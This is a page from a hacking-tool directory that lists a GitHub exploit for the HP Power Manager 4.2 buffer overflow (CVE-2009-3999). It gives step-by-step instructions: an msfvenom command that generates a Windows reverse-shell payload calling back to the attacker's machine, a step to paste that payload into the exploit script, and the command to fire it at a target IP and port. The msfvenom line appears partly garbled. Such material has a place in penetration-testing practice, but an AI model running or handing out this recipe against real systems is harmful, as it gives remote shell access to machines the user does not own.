Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2009-3999 — HP Power Manager 4.2 (Build 7) exploit | Kitploit
Tools/GitHubGitHub/afifudinmtop/cve-2009-3999
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingBinary Exploitation
GitHubafifudinmtop/cve-2009-3999

CVE-2009-3999

HP Power Manager 4.2 (Build 7) exploit

View Repository
17 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2009-3999

HP Power Manager 4.2 (Build 7) exploit
inspired by https://github.com/CountablyInfinite/HP-Power-Manager-Buffer-Overflow-Python3

STEP 1

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR-KALI-LINUX-IP LPORT=80 EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python

STEP 2

copy output of msfvenom into script, remove b
buf += b" to buf += "
from line 34 to 62

STEP 3

sudo python3 ./hp_pm_exploit_p3.py RHOST RPORT LPORT
Example: sudo python3 ./hp_pm_exploit_p3.py 192.168.103.45 80 80

Download Tool